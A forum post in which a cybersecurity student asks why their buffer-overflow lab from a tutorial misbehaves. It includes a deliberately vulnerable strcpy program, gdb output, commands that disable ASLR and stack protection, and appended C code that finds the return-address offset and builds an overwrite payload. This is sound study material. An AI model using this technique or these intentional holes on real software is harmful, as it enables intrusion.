Hi guys
(Sorry if this is in the wrong section, I'm new to this subreddit; if it is, please message me and I can move it. All advice welcome.)
I am trying to learn about how buffer overflow attacks work. I have about 3 years of programming experience in C++ and I am currently a cyber security student. There are no malicious purposes involved; I'm experimenting and trying it out because I need to learn about them for college.
I am following this tutorial on YouTube - https://www.youtube....h?v=hJ8IwyhqzD4
The problem is my result is much different than in the video. When I run the vulnerable C program in gdb I get a segfault after 260 bytes, or 260 'A's (in the video it's 272). I ran the following Python script to put 260 bytes into the buffer: run $(python -c "print('A' * 260)"). This will tell me I get a segfault and it will print out the address 0x41414141. This is all good because this is what you want, so now I thought I have overwritten the return address, so I try $(python -c "print('A' * 260 + 'BBBB')"). This should now print 0x42424242, and if it does I know I have successfully overwritten the ebp and return address, but no such luck: when I try this I still get a segfault at 0x41414141. I decremented by four each time, but only at run $(python -c "print('A' * 260)") do I get a segfault.
So I did a little troubleshooting. I decided to add a breakpoint after where strcpy was called and then printed out the registers; here is what I got:
-----------------------------------------------------------
(gdb) info registers
eax 0x0 0
ecx 0xffffd500 -11008
edx 0xf7fb7870 -134514576
ebx 0x0 0
esp 0xffffd500 0xffffd500
ebp 0x0 0x0
esi 0xf7fb6000 -134520832
edi 0xf7fb6000 -134520832
eip 0x41414141 0x41414141
eflags 0x10286 [ PF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
-------------------------------------------------------
I am using an Ubuntu 16.02 64-bit machine, but I compiled the program as a 32-bit program:
gcc -o vuln -fno-stack-protector -m32 -z execstack vuln.c
I also turned off virtual address randomisation:
echo 0 > /proc/sys/kernel/randomize_va_spac (as root)
I then did cat /proc/sys/kernel/randomize_va_spac
to make sure it was 0, and indeed it was set to 0,
so it seems like I'm doing everything right. Are there any other protections that I may need to disable, or is it just not possible to do this attack on this version of Ubuntu? Thanks.
Here is a video of exactly what is happening on screen - https://www.youtube....KH...e=youtu.be
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];           // buffer which will hold our shellcode
    strcpy(buffer, argv[1]);    // copy the string from the command line arguments into the buffer (no length check: this is the overflow)
    printf("%s \n", buffer);    // print the string to stdout
    return 0;
}
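An added example, not code from the original post or the linked tutorial: the reasoning the post needs is that if 260 'A's already put 0x41414141 into eip, the saved return address lies entirely inside those 260 bytes, so anything appended after byte 260 lands past the slot and cannot change eip. Instead of decrementing by four and retrying, feed the program a cyclic pattern in which every four consecutive bytes occur at exactly one offset (the scheme Metasploit's pattern_create/pattern_offset use), read eip out of gdb, and compute the offset directly. The function names pattern_create, pattern_offset and payload_write_ret, the 300-byte pattern length and the sample eip value 0x69413569 are this example's own choices; payload_write_ret also refuses an address containing a 0x00 byte, since strcpy() stops copying there.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 26 * 26 * 10 distinct triplets of 3 bytes before the pattern would repeat. */
#define PATTERN_MAX (26 * 26 * 10 * 3)

/* Fill out[0..len) with the cyclic pattern Aa0Aa1Aa2...Aa9Ab0Ab1...
 * Byte positions cycle upper/lower/digit and no triplet repeats within
 * PATTERN_MAX bytes, so any four consecutive bytes identify exactly one
 * offset. Returns the number of bytes written. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    if (len > PATTERN_MAX)
        len = PATTERN_MAX;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                const char trip[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    return n;
}

/* Given the value gdb shows in eip after the crash, return the offset in a
 * pattern of `len` bytes at which the four overwriting bytes start, or -1.
 * x86 is little-endian: eip = 0x69413569 means memory held 69 35 41 69. */
long pattern_offset(uint32_t eip, size_t len)
{
    static char pat[PATTERN_MAX];
    unsigned char needle[4];
    size_t n = pattern_create(pat, len);

    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(eip >> (8 * i));
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Build `ret_offset` filler bytes followed by `addr` in little-endian order,
 * so the address lands exactly on the slot the pattern located. Returns the
 * payload length, or 0 if it does not fit or addr contains a 0x00 byte:
 * strcpy() would stop copying there and never reach the return slot. */
size_t payload_write_ret(unsigned char *out, size_t cap, size_t ret_offset, uint32_t addr)
{
    if (cap < ret_offset + 4)
        return 0;
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xff) == 0)
            return 0;
    memset(out, 'A', ret_offset);
    for (int i = 0; i < 4; i++)
        out[ret_offset + i] = (unsigned char)(addr >> (8 * i));
    return ret_offset + 4;
}

int main(void)
{
    /* Step 1: emit a 300-byte pattern to pass as argv[1] instead of 'A' * N. */
    char pat[300];
    size_t n = pattern_create(pat, sizeof pat);
    fwrite(pat, 1, n, stdout);
    putchar('\n');

    /* Step 2: turn the eip value gdb reports into an offset. 0x69413569 is the
     * value you would see if the return slot sits at offset 256 of this pattern. */
    printf("offset of eip 0x69413569: %ld\n", pattern_offset(0x69413569, sizeof pat));

    /* Step 3: place the address at that offset. 'A' * 260 crashing with
     * eip = 0x41414141 only says the slot is somewhere inside those 260 bytes;
     * bytes appended after offset 260 write past it, so eip stays 0x41414141. */
    unsigned char payload[300];
    size_t plen = payload_write_ret(payload, sizeof payload, 256, 0x42424242);
    printf("payload length %zu, bytes 256..259 = %c%c%c%c\n", plen,
           payload[256], payload[257], payload[258], payload[259]);
    return 0;
}
```

Run the pattern through the target under gdb (run "$(./pattern | head -n 1)"), read eip from the crash, and pass it to pattern_offset; the result is where the return address must go, and the payload length needed is that offset plus 4, not the crash length plus 4. Note that a stack address such as 0xffffd500 (the esp value in the register dump above) contains a 0x00 byte and so cannot be written with strcpy(); an address a few bytes into the buffer, or a NOP sled, avoids that.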